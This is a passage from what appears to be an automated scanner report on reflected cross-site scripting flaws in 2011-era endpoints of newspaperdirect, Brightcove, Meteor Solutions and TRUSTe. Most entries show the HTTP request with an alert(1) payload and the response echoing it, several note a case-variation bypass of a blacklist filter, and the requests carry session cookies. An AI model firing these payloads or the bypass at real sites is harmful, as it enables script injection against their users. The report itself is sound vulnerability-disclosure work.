HomePageManager.Pictures.DataManager.onDataLoaded7b357<script>alert(1)</script>dcde2ff62ac([{id:"47a9b2b0-91be-400a-8f04-6330867a2c04",key:"2abXk7wkLUHesN7z0Gy4qg==",width:718,fpscale:10,type:"pic",article:{id:"e8459750-9218-41e4-8a6d-5bdc7aaad8fa",page:1,title:"HUMAN GUINEA PIGS",rank:4,po
...[SNIP]...

4.91. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonheraldnie.newspaperdirect.com
Path:   /epaper/Services/HomePageHandler.ashx

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 39203%3balert(1)//7c31c657ad7 was submitted in the callback parameter. This input was echoed as 39203;alert(1)//7c31c657ad7 in the application's response. Because the name is emitted as a bare identifier, the semicolon ends the call statement and // comments out the argument list that follows, so the injected alert(1) runs wherever this response is loaded as a script. There is no safe encoding for a function name; the fix is to accept only a dotted identifier and refuse anything else.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /epaper/Services/HomePageHandler.ashx?host=bostonheraldnie.newspaperdirect.com&type=imgsrvs&callback=HomePageManager._onImgSrvsDataLoaded39203%3balert(1)//7c31c657ad7 HTTP/1.1
Host: bostonheraldnie.newspaperdirect.com
Proxy-Connection: keep-alive
Referer: http://bostonheraldnie.newspaperdirect.com/epaper/homepage_v2.aspx?date=17.9.2011&width=1087
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AProfile=l/dlCd2JUFoJvDZBu7A3D1ctGjY=; psid=283487331; __utma=29240111.1007682055.1316239560.1316239560.1316239560.1; __utmb=29240111.1.10.1316239560; __utmc=29240111; __utmz=29240111.1316239560.1.1.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/national/

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 24 Sep 2011 01:42:38 GMT
Last-Modified: Sat, 17 Sep 2011 01:42:38 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
wc: 2
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:42:38 GMT
Content-Length: 220

HomePageManager._onImgSrvsDataLoaded39203;alert(1)//7c31c657ad7(["http://cache2-thumb1.pressdisplay.com/pressdisplay/docserver/getimage.aspx","http://cache2-thumb2.pressdisplay.com/pressdisplay/docserver/getimage.aspx"])

4.92. http://bostonheraldnie.newspaperdirect.com/epaper/check.session [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonheraldnie.newspaperdirect.com
Path:   /epaper/check.session

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 5a4d3<script>alert(1)</script>798bcc7a568 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /epaper/check.session?callback=check_session_callback5a4d3<script>alert(1)</script>798bcc7a568&t=1316239605342 HTTP/1.1
Host: bostonheraldnie.newspaperdirect.com
Proxy-Connection: keep-alive
Referer: http://bostonheraldnie.newspaperdirect.com/epaper/viewer.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AProfile=l/dlCd2JUFoJvDZBu7A3D1ctGjY=; psid=283487331; homepage_settings_4=20_5_15_6_15_6_15_6_15_6_15_6_30_5_5_5_5_22_11_16_11_11_6_8_1_15_6; __utma=29240111.1007682055.1316239560.1316239560.1316239560.1; __utmb=29240111.9.10.1316239560; __utmc=29240111; __utmz=29240111.1316239560.1.1.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/national/

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
wc: 4
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:45:23 GMT
Content-Length: 88

check_session_callback5a4d3<script>alert(1)</script>798bcc7a568({interval:0,timeout:0});

4.93. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/messagebroker/amf

Issue detail

The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload e4004<script>alert(1)</script>f95237046cf was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /services/messagebroker/amf?playerKey=AQ~~,AAAAE6Rs9lk~,SN2uQ1cpwugime4djplD8tTayQcrFkg9 HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
Content-Length: 554
Origin: http://bostonherald.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-amf
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

.......Fcom.brightcove.experience.ExperienceRuntimeFacade.getDataForExperience../1.....    ...Qfa49d8dcd1acf958feddf0bf286c3afd013add68
cccom.brightcove.experience.ViewerExperienceRequest.experienceId.de
...[SNIP]...

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Content-Type: application/x-amf
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:33:17 GMT
Server:
Content-Length: 5105

......../1/onResult.......
.C[com.brightcove.templating.ViewerExperienceDTO#analyticsTrackers.publisherType.publisherId.playerKey.version#programmedContent!adTranslationSWF.id.hasProgramming+programmi
...[SNIP]...
3.l.Y...eAQ~~,AAAAE6Rs9lk~,SN2uQ1cpwugime4djplD8tTayQcrFkg9.    ..videoPlayer
sicom.brightcove.player.programming.ProgrammedMediaDTO.mediaId..playerId.componentRefId    type.mediaDTO
.Bp.........ivideoPlayere4004<script>alert(1)</script>f95237046cf.........
.cOcom.brightcove.catalog.trimmed.VideoDTO.dateFiltered+FLVFullLengthStreamed/SWFVerificationRequired.endDate.FLVFullCodec.linkText.geoRestricted.previewLength.FLVPreviewSize.longDescription.
...[SNIP]...

4.94. http://cdnt.meteorsolutions.com/api/ie8_email [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/ie8_email

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload ccca6<script>alert(1)</script>b631027d26d was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ie8_email?url=httpG3AG2FG2FattuverseoffersG2EcomG2FtvG5FhsiG5FbundlesG2FindexG2EphpG3FsendVarG3D20StateG5F49PromoOfferG26sourceG3DECbc0000000WIP00OG26fbidG3D9Lm6uVSxVG5FuG26mtagG3DmbarG2DemailG23&shorten=tinyurl&id=1ccca6<script>alert(1)</script>b631027d26d&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%201)%3B HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_d4421046-efa2-4b8f-86b0-7cdce9b8067a=d4421046-efa2-4b8f-86b0-7cdce9b8067a%3C%3EYRv1CNCXi5e%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.att.com%2F; uid=c5699614-96b6-4b6d-81ac-02170daae0a6

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 01:40:49 GMT
Etag: "a4b5740c82ba57098d3f47fe0f640d85a84fd058"
Server: nginx/0.7.65
Content-Length: 180
Connection: keep-alive

meteor.json_query_callback({"url": "http://meme.ms/cuip47", "id": "1ccca6<script>alert(1)</script>b631027d26d", "persist": "http://meme.ms/persist?key=P3lDVrJa3rexwrmXrfPlFA"}, 1);

4.95. http://cdnt.meteorsolutions.com/api/ie8_email [jsonp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/ie8_email

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 16faf<script>alert(1)</script>25da9310260 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ie8_email?url=httpG3AG2FG2FattuverseoffersG2EcomG2FtvG5FhsiG5FbundlesG2FindexG2EphpG3FsendVarG3D20StateG5F49PromoOfferG26sourceG3DECbc0000000WIP00OG26fbidG3D9Lm6uVSxVG5FuG26mtagG3DmbarG2DemailG23&shorten=tinyurl&id=1&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%201)%3B16faf<script>alert(1)</script>25da9310260 HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_d4421046-efa2-4b8f-86b0-7cdce9b8067a=d4421046-efa2-4b8f-86b0-7cdce9b8067a%3C%3EYRv1CNCXi5e%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.att.com%2F; uid=c5699614-96b6-4b6d-81ac-02170daae0a6

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 01:41:29 GMT
Etag: "2f474720da0453874e528615d87c85b45464f2e0"
Server: nginx/0.7.65
Content-Length: 180
Connection: keep-alive

meteor.json_query_callback({"url": "http://meme.ms/cuip47", "id": "1", "persist": "http://meme.ms/persist?key=P3lDVrJa3rexwrmXrfPlFA"}, 1);16faf<script>alert(1)</script>25da9310260

4.96. http://cdnt.meteorsolutions.com/api/track [jsonp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/track

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 9af12<script>alert(1)</script>c3b46f05e43 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/track?application_id=ee612e29-9b27-4ec8-bbf8-759478dd3755&url_fbid=9Lm6uVSxV_u&parent_fbid=&referrer=http%3A%2F%2Ftrack.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%3FclickData%3DwmoAAMNqAAA%2FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%3Dhttp%3A%2F%2Fclk.atdmt.com%2Fgo%2F335787632%2Fdirect%3Bwi.728%3Bhi.90%3Bai.236941493%3Bct.1%2F01&location=http%3A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%3FsendVar%3D20State_49PromoOffer%26source%3DECbc0000000WIP00O%26fbid%3D9Lm6uVSxV_u&url_tag=NOMTAG&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3B9af12<script>alert(1)</script>c3b46f05e43 HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_d4421046-efa2-4b8f-86b0-7cdce9b8067a=d4421046-efa2-4b8f-86b0-7cdce9b8067a%3C%3EYRv1CNCXi5e%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.att.com%2F; uid=c5699614-96b6-4b6d-81ac-02170daae0a6

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 01:42:01 GMT
Etag: "5c7333cf004a2bbfe1f6d26ba5911f5ba91d6b40"
P3P: CP="NID DSP ALL COR"
Server: nginx/0.7.65
Set-Cookie: meteor_server_ee612e29-9b27-4ec8-bbf8-759478dd3755=ee612e29-9b27-4ec8-bbf8-759478dd3755%3C%3E9Lm6uVSxV_u%3C%3E%3C%3Ehttp%253A%2F%2Ftrack.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%2FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253Dhttp%253A%2F%2Fclk.atdmt.com%2Fgo%2F335787632%2Fdirect%253Bwi.728%253Bhi.90%253Bai.236941493%253Bct.1%2F01%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u; Domain=.meteorsolutions.com; expires=Sun, 16 Sep 2012 01:42:01 GMT; Path=/
Set-Cookie: uid=c5699614-96b6-4b6d-81ac-02170daae0a6%00d77c2<a>11e0dd2ac6e; Domain=.meteorsolutions.com; expires=Sun, 16 Sep 2012 01:42:01 GMT; Path=/
Content-Length: 206
Connection: keep-alive

meteor.json_query_callback({"parent_id": "", "id": "9Lm6uVSxV_u", "uid": "c5699614\\x2D96b6\\x2D4b6d\\x2D81ac\\x2D02170daae0a6\\x00d77c2\\x3Ca\\x3E11e0dd2ac6e"}, 0);9af12<script>alert(1)</script>c3b46f05e43

4.97. http://choices.truste.com/ca [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 91d0b<script>alert(1)</script>b9789a4c38 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0511wl728x90&c=att02cont1291d0b<script>alert(1)</script>b9789a4c38&w=728&h=90&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/335787632/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdzTEOgDAIheGrGGabUCjt002rnsa4ORnvLrj9X8ILD6nSPMgEreNAKo4mhlxc2UFdodi3nFhqSeWYJK0rI4F5YaAffdsppnHcTLiF5FeUeVVTeBbP6z5Pzxp_WCy_H4MVGc4-%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%252FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:33:33 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5737
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
ntDivName:"te-clr1-62adc6f1-e43b-47bc-8db1-bcd5cb5ff449-itl",iconSpanId:"te-clr1-62adc6f1-e43b-47bc-8db1-bcd5cb5ff449-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerId:"att02cont1291d0b<script>alert(1)</script>b9789a4c38",noticeBaseUrl:"http://choices-elb.truste.com/camsg?",irBaseUrl:"http://choices-elb.truste.com/cair?",interstitial:te_clr1_62adc6f1_e43b_47bc_8db1_bcd5cb5ff449_ib,interstitialWidth:728,interstitialHei
...[SNIP]...

4.98. http://choices.truste.com/ca [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload fed22<ScRiPt>alert(1)</ScRiPt>002ba52e113 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks, but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att02&cid=0511wl728x90fed22<ScRiPt>alert(1)</ScRiPt>002ba52e113&c=att02cont12&w=728&h=90&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/335787632/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdzTEOgDAIheGrGGabUCjt002rnsa4ORnvLrj9X8ILD6nSPMgEreNAKo4mhlxc2UFdodi3nFhqSeWYJK0rI4F5YaAffdsppnHcTLiF5FeUeVVTeBbP6z5Pzxp_WCy_H4MVGc4-%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%252FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:33:10 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5821
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
<a href="http://preferences.truste.com/preference.html?affiliateId=16&pid=mec01&aid=att02&cid=0511wl728x90fed22<ScRiPt>alert(1)</ScRiPt>002ba52e113&w=728&h=90" target="_blank">
...[SNIP]...

4.99. http://choices.truste.com/ca [iplc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the iplc request parameter is copied into the HTML document as plain text between tags. The payload b2beb<ScRiPt>alert(1)</ScRiPt>9888b1420ce was submitted in the iplc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks, but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att02&cid=0511wl728x90&c=att02cont12&w=728&h=90&zi=10002&plc=tr&iplc=ctrb2beb<ScRiPt>alert(1)</ScRiPt>9888b1420ce HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/335787632/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdzTEOgDAIheGrGGabUCjt002rnsa4ORnvLrj9X8ILD6nSPMgEreNAKo4mhlxc2UFdodi3nFhqSeWYJK0rI4F5YaAffdsppnHcTLiF5FeUeVVTeBbP6z5Pzxp_WCy_H4MVGc4-%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%252FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:36:28 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5739
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
cdd_eaa0_4b10_9820_b0aa6f5cb790_bi={baseName:"te-clr1-6739ccdd-eaa0-4b10-9820-b0aa6f5cb790",anchName:"te-clr1-6739ccdd-eaa0-4b10-9820-b0aa6f5cb790-anch",width:728,height:90,ox:0,oy:0,plc:"tr",iplc:"ctrb2beb<ScRiPt>alert(1)</ScRiPt>9888b1420ce",intDivName:"te-clr1-6739ccdd-eaa0-4b10-9820-b0aa6f5cb790-itl",iconSpanId:"te-clr1-6739ccdd-eaa0-4b10-9820-b0aa6f5cb790-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerId:"att02con
...[SNIP]...

4.100. http://choices.truste.com/ca [plc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload a6613<ScRiPt>alert(1)</ScRiPt>b83e4cf829 was submitted in the plc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks, but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att02&cid=0511wl728x90&c=att02cont12&w=728&h=90&zi=10002&plc=tra6613<ScRiPt>alert(1)</ScRiPt>b83e4cf829&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/335787632/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdzTEOgDAIheGrGGabUCjt002rnsa4ORnvLrj9X8ILD6nSPMgEreNAKo4mhlxc2UFdodi3nFhqSeWYJK0rI4F5YaAffdsppnHcTLiF5FeUeVVTeBbP6z5Pzxp_WCy_H4MVGc4-%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%252FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:35:50 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5737
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
_clr1_651da5c8_906d_4ecd_9ea4_8e2426759de9_bi={baseName:"te-clr1-651da5c8-906d-4ecd-9ea4-8e2426759de9",anchName:"te-clr1-651da5c8-906d-4ecd-9ea4-8e2426759de9-anch",width:728,height:90,ox:0,oy:0,plc:"tra6613<ScRiPt>alert(1)</ScRiPt>b83e4cf829",iplc:"ctr",intDivName:"te-clr1-651da5c8-906d-4ecd-9ea4-8e2426759de9-itl",iconSpanId:"te-clr1-651da5c8-906d-4ecd-9ea4-8e2426759de9-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerI
...[SNIP]...

4.101. http://choices.truste.com/ca [zi parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

